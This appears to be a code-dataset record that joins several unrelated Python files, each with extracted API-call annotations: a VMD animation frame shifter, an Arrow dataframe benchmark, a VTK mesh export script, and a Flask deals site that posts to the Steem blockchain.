(['"""agregarCliente"""'], {}), "('agregarCliente')\n", (7725, 7743), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((8653, 8672), 'csv.writer', 'csv.writer', (['archivo'], {}), '(archivo)\n', (8663, 8672), False, 'import csv\n'), ((8986, 9012), 'flask.url_for', 'url_for', (['"""agregarProducto"""'], {}), "('agregarProducto')\n", (8993, 9012), False, 'from flask import render_template, redirect, url_for, flash, session\n')] |
import sys
sys.path.append('../../../vmdgadgets')
import vmdutil
OFFSET = 5
#RANGE = [(1, 3127), (3467, 6978)]
RANGE = [(1, 3100), (3467, 6978)]
def in_range(frame, offset=0):
for r in RANGE:
if r[0] <= frame <= (r[1] + offset):
return True
else:
return False
if '__main__' == __name__ :
vmdin = vmdutil.Vmdio()
vmdin.load(sys.argv[1])
bones = vmdin.get_frames('bones')
for i in range(3):
offset = (i + 1) * OFFSET
output = list()
for bone_frame in bones:
if in_range(bone_frame.frame, offset):
output.append(bone_frame._replace(frame=bone_frame.frame + offset))
else:
output.append(bone_frame)
vmdin.set_frames('bones', output)
vmdin.store('plus_{}.vmd'.format(offset))
| [
"vmdutil.Vmdio",
"sys.path.append"
] | [((11, 49), 'sys.path.append', 'sys.path.append', (['"""../../../vmdgadgets"""'], {}), "('../../../vmdgadgets')\n", (26, 49), False, 'import sys\n'), ((339, 354), 'vmdutil.Vmdio', 'vmdutil.Vmdio', ([], {}), '()\n', (352, 354), False, 'import vmdutil\n')] |
import conbench.runner
import pyarrow
import pyarrow.parquet as parquet
from benchmarks import _benchmark
@conbench.runner.register_benchmark
class DataframeToTableBenchmark(_benchmark.Benchmark, _benchmark.BenchmarkR):
"""
Convert a pandas dataframe to an arrow table.
DataframeToTableBenchmark().run(<source>, options...)
Parameters
----------
source : str
A source name from the benchmarks source store.
language : str, optional
Valid values: "Python", "R".
cpu_count : int, optional
Set the number of threads to use in parallel operations (arrow).
iterations : int, default 1
Number of times to run the benchmark.
gc_collect : boolean, default True
Whether to do garbage collection before each benchmark run.
gc_disable : boolean, default True
Whether to do disable collection during each benchmark run.
run_id : str, optional
Group executions together with a run id.
Returns
-------
(result, output) : sequence
result : The benchmark result.
output : The output from the benchmarked function.
"""
name, r_name = "dataframe-to-table", "df_to_table"
exclude = [
# https://issues.apache.org/jira/browse/ARROW-11832
"dataframe-to-table ALL --iterations=3 --language=R"
]
arguments = ["source"]
sources = [
"chi_traffic_2020_Q1",
"type_strings",
"type_dict",
"type_integers",
"type_floats",
"type_nested",
"type_simple_features",
]
sources_test = [
"chi_traffic_sample",
"type_strings",
"type_dict",
"type_integers",
"type_floats",
"type_nested",
"type_simple_features",
]
options = {
"language": {"type": str, "choices": ["Python", "R"]},
"cpu_count": {"type": int},
}
def run(self, source, cpu_count=None, **kwargs):
language = kwargs.get("language", "Python").lower()
for source in self.get_sources(source):
tags = self.get_tags(source, cpu_count)
if language == "python":
dataframe = self._get_dataframe(source.source_path)
f = self._get_benchmark_function(dataframe)
yield self.benchmark(f, tags, kwargs)
elif language == "r":
command = self._get_r_command(source, kwargs)
yield self.r_benchmark(command, tags, kwargs)
def _get_benchmark_function(self, dataframe):
return lambda: pyarrow.Table.from_pandas(dataframe)
def _get_dataframe(self, path):
return parquet.read_table(path, memory_map=False).to_pandas()
def _get_r_command(self, source, options):
return (
f"library(arrowbench); "
f"run_one({self.r_name}, "
f'source="{source.name}", '
f'n_iter={options.get("iterations", 1)}, '
f"cpu_count={self.r_cpu_count(options)})"
)
| [
"pyarrow.parquet.read_table",
"pyarrow.Table.from_pandas"
] | [((2567, 2603), 'pyarrow.Table.from_pandas', 'pyarrow.Table.from_pandas', (['dataframe'], {}), '(dataframe)\n', (2592, 2603), False, 'import pyarrow\n'), ((2656, 2698), 'pyarrow.parquet.read_table', 'parquet.read_table', (['path'], {'memory_map': '(False)'}), '(path, memory_map=False)\n', (2674, 2698), True, 'import pyarrow.parquet as parquet\n')] |
# coding=utf-8
import sys
import petsc4py
petsc4py.init(sys.argv)
from pyvtk import *
import numpy as np
from scipy.io import loadmat
from src import stokes_flow as sf
from src.stokes_flow import problem_dic, obj_dic
from src.geo import *
def main_fun():
matname = 'around'
if matname[-4:] != '.mat':
matname = matname + '.mat'
bnodesHeadle = 'bnodes'
belemsHeadle = 'belems'
fileHandle = 'tryVTK'
bgeo = base_geo()
bgeo.mat_nodes(filename=matname, mat_handle=bnodesHeadle)
bgeo.mat_elmes(filename=matname, mat_handle=belemsHeadle, elemtype='tetra')
bnodes = bgeo.get_nodes()
belems, elemtype = bgeo.get_mesh()
err_msg = 'mesh type is NOT tetrahedron. '
assert elemtype == 'tetra', err_msg
u = bnodes
vtk = VtkData(
UnstructuredGrid(bnodes,
tetra=belems,
),
PointData(Vectors(u, name='velocity')),
' '
)
vtk.tofile(fileHandle)
if __name__ == '__main__':
main_fun()
| [
"petsc4py.init"
] | [((44, 67), 'petsc4py.init', 'petsc4py.init', (['sys.argv'], {}), '(sys.argv)\n', (57, 67), False, 'import petsc4py\n')] |
from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response
from flaskext.markdown import Markdown
from pymongo import MongoClient
from steem import Steem
from datetime import date, timedelta, datetime
from dateutil import parser
from slugify import slugify
import sys, traceback, json, textwrap, requests, pprint, time, math, arrow
app = Flask(__name__, static_folder='static', static_url_path='')
app.config.from_envvar('FOMODEALS_SETTINGS')
app.secret_key=app.config['SESSION_SECRET']
admins = app.config['ADMINS'].split(',')
Markdown(app)
db = MongoClient("mongodb://mongodb:27017").fomodeals
def confirm_user():
if not 'token' in session or not 'username' in session:
return False
r = requests.get('https://v2.steemconnect.com/api/me', headers={ 'Authorization': session['token'] })
if r.status_code == 200:
session['authorized'] = False
if r.json()['_id'] != session['username']:
return False
if session['username'] == "fomodeals":
session['authorized'] = True
elif 'account_auths' in r.json()['account']['posting']:
for auth_account in r.json()['account']['posting']['account_auths']:
if auth_account[0] == "fomodeals":
session['authorized'] = True
app.logger.info('Confirmed token and auth of {} successful'.format(session['username']))
return True
else:
session['logged_in'] = False
return False
def post_to_steem(deal, update=False):
comment_options = {
'max_accepted_payout': '1000000.000 SBD',
'percent_steem_dollars': 10000,
'allow_votes': True,
'allow_curation_rewards': True,
'extensions': [[0, {
'beneficiaries': [
{'account': 'fomodeals', 'weight': 1000}
]}
]]
}
permlink = ""
deal_post_data = {}
# populate sanitised deal data
deal_post_data['title'] = deal['title'].strip()
deal_post_data['url'] = deal['url']
deal_post_data['brand_code'] = slugify(deal['brand'])
deal_post_data['description'] = deal['description']
try:
deal_post_data['freebie'] = True if deal['freebie'] == 'on' else False
except KeyError:
deal_post_data['freebie'] = False
# TODO: validate image?
if 'image_url' not in deal or deal['image_url'] == "":
deal_post_data['image_url'] = 'https://fomodeals.org/assets/images/logo_round.png'
else:
deal_post_data['image_url'] = deal['image_url']
if 'global' in deal and deal['global'] == 'on':
deal_post_data['global'] = True
else:
deal_post_data['global'] = False
deal_post_data['country_code'] = deal['country_code']
if not 'coupon_code' in deal or deal['coupon_code'].strip() == "":
deal_post_data['coupon_code'] = False
else:
deal_post_data['coupon_code'] = deal['coupon_code'].strip()
try:
deal_post_data['date_start'] = parser.parse(deal['deal_start']).isoformat()
except ValueError:
deal_post_data['date_start'] = date.today().isoformat()
try:
deal_post_data['date_end'] = parser.parse(deal['deal_end']).isoformat()
except ValueError:
deal_post_data['date_end'] = (parser.parse(deal_post_data['date_start']) + timedelta(days=45)).isoformat()
json_metadata = {
'community': 'fomodeals',
'app': 'fomodeals/1.0.0',
'format': 'markdown',
'tags': [ 'fomodeals' ],
'image': [ "https://steemitimages.com/0x0/" + deal_post_data['image_url'] ],
'deal': deal_post_data
}
if 'country_code' in deal_post_data and not deal_post_data['global']:
json_metadata['tags'].append('fomodeals-'+deal['country_code'])
else:
json_metadata['tags'].append('fomodeals-global')
app.logger.info("deal_post_data: {}".format(deal_post_data))
body = render_template("deal_post.md", deal=deal_post_data)
try:
if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
s = Steem(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com', 'https://steemd.steemitstage.com'],
keys=[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']])
if update:
p = s.commit.post(title=deal['title'],
body=body,
author=session['username'],
json_metadata=json_metadata)
else:
p = s.commit.post(title=deal['title'],
body=body,
author=session['username'],
json_metadata=json_metadata,
comment_options=comment_options,
self_vote=True)
permlink = p['operations'][0][1]['permlink']
app.logger.info("Posted to STEEM with id={}".format(permlink))
return True
else:
app.logger.info("Skipped posting to steem:\n\n{}".format(body))
return False
except Exception as e:
app.logger.info(e)
traceback.print_exc(file=sys.stdout)
return False
@app.template_filter('humanize')
def _jinja2_filter_humanize(t):
l = arrow.get(parser.parse(t))
return l.humanize()
@app.template_filter('reputation')
def _jinja2_filter_reputation(rep):
rep = int(rep)
calc = (math.log10(abs(rep) - 10) - 9)
if rep < 0:
calc = -calc
return int(calc * 9 + 25)
@app.template_filter('expired')
def _jinja2_filter_expired(date):
date = parser.parse(date)
native = date.replace(hour=23, minute=59, tzinfo=None)
ds = (native-date.today()).total_seconds()
if ds < 0:
return True
else:
return False
@app.template_filter('expires_class')
def _jinja2_filter_expires_class(date, fmt=None):
date = parser.parse(date)
native = date.replace(hour=23, minute=59, tzinfo=None)
days = (native-date.today()).days
if days <= 2:
return "red pulse"
else:
return "grey lighten-1"
@app.template_filter('expires_time')
def _jinja2_filter_expires_time(date, fmt=None):
date = parser.parse(date)
native = date.replace(hour=23, minute=59, tzinfo=None)
days = (native-date.today()).days
ds = (native-date.today()).total_seconds()
if ds < 0:
return "{} day{} ago".format(abs(days), '' if abs(days) == 1 else 's')
elif ds < 86400:
return "now"
elif ds < 172800:
return "soon"
else:
return "in {} day{}".format(days, '' if days == 1 else 's')
@app.template_filter('datetimeformat')
def _jinja2_filter_datetime(date, fmt=None):
date = parser.parse(date)
native = date.replace(tzinfo=None)
format='%b %d, %Y'
return native.strftime(format)
@app.route("/fomodeals/@<author>/<permlink>")
def read_deal(author, permlink):
try:
r = requests.get(
'https://api.steemjs.com/getState?path=/fomodeals/@{}/{}'.format(author, permlink))
if r.status_code == 200:
all_content = r.json()['content']
content = all_content['{}/{}'.format(author, permlink)]
json_metadata = json.loads(content['json_metadata'])
deal_metadata = json_metadata['deal']
payout = float(content['pending_payout_value'].split(" ")[0])
return render_template('details.html', author=author, permlink=permlink, json_metadata=json_metadata, deal=deal_metadata, content=all_content, payout="{0:.2f}".format(payout))
else:
return render_template('404.html'), 404
except Exception as e:
app.logger.info(e)
return redirect('https://steemit.com/fomodeals/@{}/{}'.format(author, permlink))
@app.route("/vote/<author>/<permlink>/<kind>")
def vote(author, permlink, kind):
if 'logged_in' in session and session['logged_in'] and 'authorized' in session and session['authorized'] and 'username' in session:
try:
weight=100
if kind == "flag":
weight=-100
identifier = "@" + author + "/" + permlink
if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
s = Steem(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com', 'https://steemd.steemitstage.com'],
keys=[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']])
p = s.commit.vote(identifier, weight, account=session['username'])
app.logger.info(p)
return jsonify({ 'status': True })
except Exception as e:
app.logger.info(e)
return jsonify({ 'status': False, 'msg': 'unknown exception' })
else:
return jsonify({ 'status': False, 'msg': 'please login and authorize first' })
@app.route("/whoami")
def whoami():
if 'username' in session:
return jsonify({ 'username': session['username']})
else:
return jsonify({ 'username': "" });
@app.route("/update/<permlink>", methods=['GET', 'POST'])
def update(permlink):
if 'logged_in' in session and session['logged_in'] and 'username' in session and session['username'] in app.config['ADMINS'].split(','):
if request.method == 'POST':
deal_update=request.form.to_dict()
# fix some values
if deal_update['warning'].strip() != "":
deal_update['available'] = False
else:
deal_update['available'] = True
if not 'freebie' in deal_update:
deal_update['freebie'] = ''
if not 'global' in deal_update:
deal_update['global'] = ''
if not 'hide' in deal_update:
deal_update['hide'] = False;
else:
deal_update['hide'] = True;
try:
deal_update['deal_start'] = parser.parse(deal_update['deal_start']).isoformat()
except ValueError:
deal_update['deal_start'] = date.today().isoformat()
try:
deal_update['deal_end'] = parser.parse(deal_update['deal_end']).isoformat()
except ValueError:
deal_update['deal_end'] = (date.today() + timedelta(days=45)).isoformat()
deal_update['deal_expires'] = deal_update['deal_end']
deal_update['brand_code'] = slugify(deal_update['brand'])
# TODO: needs more testing on testnet...
# p = post_to_steem(deal_update, update=True)
# app.logger.info("STEEM updated? {}".format(p))
app.logger.info("updating {}: {}".format(permlink, deal_update))
try:
db.deal.update_one({ 'permlink': permlink },
{ '$set': deal_update }, upsert=False)
except Exception as e:
flash(u'Sorry but there was an error trying to update your deal: ' + textwrap.shorten(str(e), width=80, placeholder="..."), 'error')
return redirect(url_for('index'))
else:
deal = db.deal.find_one({'permlink': permlink })
app.logger.info("requested update of: {}".format(deal))
return render_template('update.html', deal=deal)
else:
app.logger.info("non-authorised update attempt ({}, {})".format(permlink, session['username'] if 'username' in session else 'anon'))
return render_template('login_failed.html'), 401
@app.route("/")
def index():
# TODO: only show non-expired deals... paginate?
deals = []
deal_cursor = db.deal.find({'deal_expires': { '$gte': date.today().isoformat()}, 'hide': { '$ne': True}}).sort([('_id', -1)])
for deal in deal_cursor:
deals.append(deal)
if 'username' in session:
if 'logged_in' in session:
app.logger.info("{} logged_in: {}, authorized: {}".format(session['username'], session['logged_in'], session['authorized']))
else:
app.logger.info("{} logged_in: {}".format(session['username'], False))
else:
app.logger.info("anonymous user")
return render_template('index.html', deals=deals, session=session, admins=admins)
@app.route("/trending")
def trending():
return render_template('trending.html')
@app.route("/created")
def created():
return render_template('created.html')
@app.route("/hot")
def hot():
return render_template('hot.html')
@app.route("/countries")
def countries_json():
countries = db.deal.find({ 'country_code': { '$ne': '' }}).distinct('country_code')
return jsonify(sorted(countries, reverse=True))
@app.route("/country/<country>")
def countries(country):
deals = []
deal_cursor=db.deal.find({'deal_expires': { '$gte': date.today().isoformat()}, 'country_code': country, 'hide': { '$ne': True}}).sort([('_id', -1)])
for deal in deal_cursor:
deals.append(deal)
return render_template('index.html', deals=deals, country=country, session=session, admins=admins)
@app.route("/freebies")
def freebies():
deals = []
deal_cursor=db.deal.find({'deal_expires': { '$gte': date.today().isoformat()}, 'freebie': 'on', 'hide': { '$ne': True}}).sort([('_id', -1)])
for deal in deal_cursor:
deals.append(deal)
return render_template('index.html', deals=deals, session=session, admins=admins)
@app.route("/brand/<brand>")
def brands(brand):
deals = []
deal_cursor=db.deal.find({'deal_expires': { '$gte': date.today().isoformat()}, 'brand_code': brand, 'hide': { '$ne': True}}).sort([('_id', -1)])
for deal in deal_cursor:
deals.append(deal)
return render_template('index.html', deals=deals, session=session, admins=admins)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.route('/logout', methods=['GET'])
def logout():
session.pop('username', None)
session.pop('token', None)
session.pop('authorized', None)
session['logged_in'] = False
return redirect(url_for('index'))
@app.route('/auth', methods=['GET'])
def authorized():
if not 'logged_in' in session or not session['logged_in']:
return render_template('login_failed.html'), 401
r = requests.get('https://v2.steemconnect.com/api/me', headers={ 'Authorization': session['token'] })
if r.status_code == 200:
app.logger.info('Auth of {} successful'.format(session['username']))
session['authorized'] = False
if r.json()['_id'] != session['username']:
session['logged_in'] = False
return render_template('login_failed.html'), 401
if session['username'] == "fomodeals":
session['authorized'] = True
if 'account_auths' in r.json()['account']['posting']:
for auth_account in r.json()['account']['posting']['account_auths']:
if auth_account[0] == "fomodeals":
session['authorized'] = True
return redirect(url_for('index'))
else:
session['logged_in'] = False
return render_template('login_failed.html'), 401
@app.route('/complete/sc/', methods=['GET'])
def complete_sc():
# TODO: verify token
token = request.args.get('access_token')
expire = request.args.get('expires_in')
username = request.args.get('username')
r = requests.get('https://v2.steemconnect.com/api/me', headers={ 'Authorization': token })
if r.status_code == 200:
app.logger.info('Login of {} successful'.format(username))
session['authorized'] = False
session['logged_in'] = username == r.json()['_id']
if username == "fomodeals":
session['authorized'] = True
elif 'account_auths' in r.json()['account']['posting']:
for auth_account in r.json()['account']['posting']['account_auths']:
if auth_account[0] == "fomodeals":
session['authorized'] = True
session['username'] = username
session['token'] = token
return redirect(url_for('index'))
else:
session['logged_in'] = False
return render_template('login_failed.html'), 401
@app.route('/comment/<parent_author>/<parent_permlink>', methods=['POST'])
def post_comment(parent_author, parent_permlink):
if not confirm_user():
return render_template('login_failed.html'), 401
comment_form=request.form.to_dict()
comment_options = {
'max_accepted_payout': '1000000.000 SBD',
'percent_steem_dollars': 10000,
'allow_votes': True,
'allow_curation_rewards': True,
'extensions': [[0, {
'beneficiaries': [
{'account': 'fomodeals', 'weight': 1000}
]}
]]
}
json_metadata = {
'community': 'fomodeals',
'app': 'fomodeals/1.0.0',
'format': 'markdown'
}
try:
if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
s = Steem(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com', 'https://steemd.steemitstage.com'],
keys=[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']])
p = s.commit.post(body=comment_form['body'],
title="",
author=session['username'],
json_metadata=json_metadata,
reply_identifier="@{}/{}".format(parent_author, parent_permlink),
comment_options=comment_options)
permlink = p['operations'][0][1]['permlink']
app.logger.info("Posted to STEEM with id={}".format(permlink))
else:
app.logger.info("Skipped posting to steem:\n\n{}".format(comment_form['body']))
permlink = "testing-{}".format(int(time.time()))
except Exception as e:
app.logger.info(e)
traceback.print_exc(file=sys.stdout)
flash(u'Sorry but there was an error trying to post your comment: ' + textwrap.shorten(str(e), width=80, placeholder="..."), 'error')
return redirect(url_for("index"))
if 'return_to' in comment_form:
return redirect(comment_form['return_to'], code=302)
else:
return redirect(url_for("index"), code=302)
@app.route('/deal', methods=['POST'])
def deal():
if not confirm_user():
return render_template('login_failed.html'), 401
deal_form=request.form.to_dict()
comment_options = {
'max_accepted_payout': '1000000.000 SBD',
'percent_steem_dollars': 10000,
'allow_votes': True,
'allow_curation_rewards': True,
'extensions': [[0, {
'beneficiaries': [
{'account': 'fomodeals', 'weight': 1000}
]}
]]
}
permlink = ""
deal_post_data = {}
# populate sanitised deal data
deal_post_data['title'] = deal_form['title'].strip()
deal_post_data['url'] = deal_form['url']
if deal_form['brand'].strip() != "":
deal_post_data['brand_code'] = slugify(deal_form['brand'].strip())
deal_post_data['description'] = deal_form['description']
try:
deal_post_data['freebie'] = True if deal_form['freebie'] == 'on' else False
except KeyError:
deal_post_data['freebie'] = False
if 'image_url' not in deal_form or deal_form['image_url'] == "":
deal_post_data['image_url'] = 'https://fomodeals.org/assets/images/logo_round.png'
else:
deal_post_data['image_url'] = deal_form['image_url']
if 'global' in deal_form and deal_form['global'] == 'on':
deal_post_data['global'] = True
else:
deal_post_data['global'] = False
deal_post_data['country_code'] = deal_form['country_code']
if not 'coupon_code' in deal_form or deal_form['coupon_code'].strip() == "":
deal_post_data['coupon_code'] = False
else:
deal_post_data['coupon_code'] = deal_form['coupon_code'].strip()
try:
deal_post_data['date_start'] = parser.parse(deal_form['deal_start']).isoformat()
except ValueError:
deal_post_data['date_start'] = date.today().isoformat()
try:
deal_post_data['date_end'] = parser.parse(deal_form['deal_end']).isoformat()
except ValueError:
deal_post_data['date_end'] = (parser.parse(deal_post_data['date_start']) + timedelta(days=45)).isoformat()
json_metadata = {
'community': 'fomodeals',
'app': 'fomodeals/1.0.0',
'format': 'markdown',
'tags': [ 'fomodeals' ],
'image': [ "https://steemitimages.com/0x0/" + deal_post_data['image_url'] ],
'deal': deal_post_data
}
if 'country_code' in deal_post_data and not deal_post_data['global']:
json_metadata['tags'].append('fomodeals-'+deal_form['country_code'])
else:
json_metadata['tags'].append('fomodeals-global')
if 'brand_code' in deal_post_data and deal_post_data['brand_code'] != "":
json_metadata['tags'].append(deal_post_data['brand_code'])
app.logger.info("deal_post_data: {}".format(deal_post_data))
body = render_template("deal_post.md", deal=deal_post_data)
try:
if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
s = Steem(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com', 'https://steemd.steemitstage.com'],
keys=[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']])
p = s.commit.post(title=deal_form['title'],
body=body,
author=session['username'],
json_metadata=json_metadata,
comment_options=comment_options,
self_vote=True)
permlink = p['operations'][0][1]['permlink']
app.logger.info("Posted to STEEM with id={}".format(permlink))
else:
app.logger.info("Skipped posting to steem:\n\n{}".format(body))
permlink = "testing-{}".format(int(time.time()))
deal_form['permlink'] = permlink
deal_form['steem_user'] = session['username']
try:
deal_form['deal_start'] = parser.parse(deal_form['deal_start']).isoformat()
except ValueError:
deal_form['deal_start'] = date.today().isoformat()
try:
deal_form['deal_end'] = parser.parse(deal_form['deal_end']).isoformat()
except ValueError:
deal_form['deal_end'] = (date.today() + timedelta(days=45)).isoformat()
deal_form['deal_expires'] = deal_form['deal_end']
deal_form['brand_code'] = slugify(deal_form['brand'])
mongo_id = db['deal'].insert(deal_form)
app.logger.info("saved to mongodb: {}\n{}".format(mongo_id, deal_form))
except Exception as e:
app.logger.info(e)
traceback.print_exc(file=sys.stdout)
flash(u'Sorry but there was an error trying to post your deal: ' + textwrap.shorten(str(e), width=80, placeholder="..."), 'error')
return redirect(url_for("submit_page"))
# TODO: make a pretty template but for now go to the post
if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
return redirect("/fomodeals/@{}/{}".format(session['username'], permlink), code=302)
else:
return redirect(url_for("index"))
@app.route('/submit')
def submit_page():
if 'logged_in' in session and session['logged_in'] and 'authorized' in session and session['authorized']:
return render_template("submit_deals.html")
return redirect(url_for('index'))
@app.route('/sitemap.xml', methods=['GET'])
def sitemap():
pages=[]
ten_days_ago = (date.today() - timedelta(days=10)).isoformat()
# static pages
for rule in app.url_map.iter_rules():
if "GET" in rule.methods and len(rule.arguments)==0:
pages.append([rule.rule, ten_days_ago])
# deals
deal_cursor = db.deal.find({'hide': { '$ne': True}}).sort([('_id', -1)])
for deal in deal_cursor:
if 'steem_user' in deal:
pages.append(["/fomodeals/@{}/{}".format(deal['steem_user'], deal['permlink']), parser.parse(deal['deal_start']).date().isoformat()])
sitemap_xml = render_template('sitemap.xml', pages=pages)
return Response(sitemap_xml, mimetype='application/xml')
| [
"flask.render_template",
"flask.request.args.get",
"flask.Flask",
"flask.request.form.to_dict",
"flask.session.pop",
"pymongo.MongoClient",
"datetime.timedelta",
"flask.jsonify",
"flaskext.markdown.Markdown",
"traceback.print_exc",
"dateutil.parser.parse",
"json.loads",
"requests.get",
"fl... | [((384, 443), 'flask.Flask', 'Flask', (['__name__'], {'static_folder': '"""static"""', 'static_url_path': '""""""'}), "(__name__, static_folder='static', static_url_path='')\n", (389, 443), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((574, 587), 'flaskext.markdown.Markdown', 'Markdown', (['app'], {}), '(app)\n', (582, 587), False, 'from flaskext.markdown import Markdown\n'), ((594, 632), 'pymongo.MongoClient', 'MongoClient', (['"""mongodb://mongodb:27017"""'], {}), "('mongodb://mongodb:27017')\n", (605, 632), False, 'from pymongo import MongoClient\n'), ((754, 853), 'requests.get', 'requests.get', (['"""https://v2.steemconnect.com/api/me"""'], {'headers': "{'Authorization': session['token']}"}), "('https://v2.steemconnect.com/api/me', headers={'Authorization':\n session['token']})\n", (766, 853), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((2111, 2133), 'slugify.slugify', 'slugify', (["deal['brand']"], {}), "(deal['brand'])\n", (2118, 2133), False, 'from slugify import slugify\n'), ((3964, 4016), 'flask.render_template', 'render_template', (['"""deal_post.md"""'], {'deal': 'deal_post_data'}), "('deal_post.md', deal=deal_post_data)\n", (3979, 4016), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((5714, 5732), 'dateutil.parser.parse', 'parser.parse', (['date'], {}), '(date)\n', (5726, 5732), False, 'from dateutil import parser\n'), ((5746, 5791), 'datetime.date.replace', 'date.replace', ([], {'hour': '(23)', 'minute': '(59)', 'tzinfo': 'None'}), '(hour=23, minute=59, tzinfo=None)\n', (5758, 5791), False, 'from datetime import date, timedelta, datetime\n'), ((6005, 6023), 'dateutil.parser.parse', 'parser.parse', (['date'], {}), '(date)\n', (6017, 6023), False, 'from dateutil import parser\n'), ((6037, 6082), 'datetime.date.replace', 'date.replace', ([], {'hour': '(23)', 'minute': '(59)', 'tzinfo': 'None'}), '(hour=23, minute=59, tzinfo=None)\n', (6049, 6082), False, 'from datetime import date, timedelta, datetime\n'), ((6306, 6324), 'dateutil.parser.parse', 'parser.parse', (['date'], {}), '(date)\n', (6318, 6324), False, 'from dateutil import parser\n'), ((6338, 6383), 'datetime.date.replace', 'date.replace', ([], {'hour': '(23)', 'minute': '(59)', 'tzinfo': 'None'}), '(hour=23, minute=59, tzinfo=None)\n', (6350, 6383), False, 'from datetime import date, timedelta, datetime\n'), ((6823, 6841), 'dateutil.parser.parse', 'parser.parse', (['date'], {}), '(date)\n', (6835, 6841), False, 'from dateutil import parser\n'), ((6855, 6880), 'datetime.date.replace', 'date.replace', ([], {'tzinfo': 'None'}), '(tzinfo=None)\n', (6867, 6880), False, 'from datetime import date, timedelta, datetime\n'), ((12225, 12299), 'flask.render_template', 'render_template', (['"""index.html"""'], {'deals': 'deals', 'session': 'session', 'admins': 'admins'}), "('index.html', deals=deals, session=session, admins=admins)\n", (12240, 12299), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((12352, 12384), 'flask.render_template', 'render_template', (['"""trending.html"""'], {}), "('trending.html')\n", (12367, 12384), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((12435, 12466), 'flask.render_template', 'render_template', (['"""created.html"""'], {}), "('created.html')\n", (12450, 12466), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((12509, 12536), 'flask.render_template', 'render_template', (['"""hot.html"""'], {}), "('hot.html')\n", (12524, 12536), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13018, 13113), 'flask.render_template', 'render_template', (['"""index.html"""'], {'deals': 'deals', 'country': 'country', 'session': 'session', 'admins': 'admins'}), "('index.html', deals=deals, country=country, session=session,\n admins=admins)\n", (13033, 13113), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13378, 13452), 'flask.render_template', 'render_template', (['"""index.html"""'], {'deals': 'deals', 'session': 'session', 'admins': 'admins'}), "('index.html', deals=deals, session=session, admins=admins)\n", (13393, 13452), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13733, 13807), 'flask.render_template', 'render_template', (['"""index.html"""'], {'deals': 'deals', 'session': 'session', 'admins': 'admins'}), "('index.html', deals=deals, session=session, admins=admins)\n", (13748, 13807), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13957, 13986), 'flask.session.pop', 'session.pop', (['"""username"""', 'None'], {}), "('username', None)\n", (13968, 13986), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13991, 14017), 'flask.session.pop', 'session.pop', (['"""token"""', 'None'], {}), "('token', None)\n", (14002, 14017), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14022, 14053), 'flask.session.pop', 'session.pop', (['"""authorized"""', 'None'], {}), "('authorized', None)\n", (14033, 14053), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14310, 14409), 'requests.get', 'requests.get', (['"""https://v2.steemconnect.com/api/me"""'], {'headers': "{'Authorization': session['token']}"}), "('https://v2.steemconnect.com/api/me', headers={'Authorization':\n session['token']})\n", (14322, 14409), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((15284, 15316), 'flask.request.args.get', 'request.args.get', (['"""access_token"""'], {}), "('access_token')\n", (15300, 15316), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15330, 15360), 'flask.request.args.get', 'request.args.get', (['"""expires_in"""'], {}), "('expires_in')\n", (15346, 15360), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15376, 15404), 'flask.request.args.get', 'request.args.get', (['"""username"""'], {}), "('username')\n", (15392, 15404), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15413, 15501), 'requests.get', 'requests.get', (['"""https://v2.steemconnect.com/api/me"""'], {'headers': "{'Authorization': token}"}), "('https://v2.steemconnect.com/api/me', headers={'Authorization':\n token})\n", (15425, 15501), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((16461, 16483), 'flask.request.form.to_dict', 'request.form.to_dict', ([], {}), '()\n', (16481, 16483), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((18502, 18524), 'flask.request.form.to_dict', 'request.form.to_dict', ([], {}), '()\n', (18522, 18524), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((21173, 21225), 'flask.render_template', 'render_template', (['"""deal_post.md"""'], {'deal': 'deal_post_data'}), "('deal_post.md', deal=deal_post_data)\n", (21188, 21225), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((24314, 24357), 'flask.render_template', 'render_template', (['"""sitemap.xml"""'], {'pages': 'pages'}), "('sitemap.xml', pages=pages)\n", (24329, 24357), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, 